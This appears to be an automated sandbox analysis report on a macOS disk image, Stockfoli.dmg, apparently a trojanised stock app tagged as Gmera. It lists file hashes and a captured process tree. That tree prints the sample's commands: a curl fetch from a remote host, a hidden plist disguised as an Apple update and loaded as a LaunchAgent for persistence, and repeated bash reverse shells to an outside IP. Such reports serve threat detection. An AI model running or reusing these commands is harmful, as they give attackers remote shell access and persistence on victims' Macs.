gmera | 118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c

General

Target

Stockfoli.dmg
Size

11.2MB
MD5

22a526c0658e542f24358178fb079c38
SHA1

352985598e83b42e99dfcb19636227335a18f8c0
SHA256

118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c
SHA512

73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af

Score

10^/10

gmera adware

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
28	ipecho.net

/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
1⤵
PID:541

/bin/bash
/bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &"
1⤵
PID:550
- /usr/bin/nohup
  nohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:551
- /usr/bin/sh
  sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:551
- /bin/sh
  sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:551
- /bin/bash
  sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:551
- - /usr/bin/curl
    curl -ks "http://owpqkszz.info/link.php?run&185.220.101.144"
    3⤵
    PID:573
- - /usr/bin/base64
    base64 --decode
    3⤵
    PID:575
- - /bin/cat
    cat /tmp/.com.apple.upd.plist
    3⤵
    PID:576
- - /bin/cp
    cp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist
    3⤵
    PID:577
- - /bin/cat
    cat /Users/run/Library/LaunchAgents/.com.apple.upd.plist
    3⤵
    PID:578
- - /bin/launchctl
    launchctl load /tmp/.com.apple.upd.plist
    3⤵
    PID:579
- - /usr/bin/screen
    screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
    3⤵
    PID:584

/bin/bash
/bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &"
1⤵
PID:561
- /usr/bin/nohup
  nohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
  2⤵
  PID:562
- /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
  /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
  2⤵
  PID:562

/bin/bash
/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'"
1⤵
PID:563

/usr/bin/screen
screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
1⤵
PID:563

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
1⤵
PID:565
- /bin/bash
  bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
  2⤵
  PID:568
- - /bin/bash
    bash -i
    3⤵
    PID:569

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
1⤵
PID:589
- /bin/bash
  bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
  2⤵
  PID:591
- - /bin/bash
    bash -i
    3⤵
    PID:592

/bin/bash
/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'"
1⤵
PID:615

/usr/bin/screen
screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
1⤵
PID:615

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
1⤵
PID:617
- /bin/bash
  bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
  2⤵
  PID:618
- - /bin/bash
    bash -i
    3⤵
    PID:619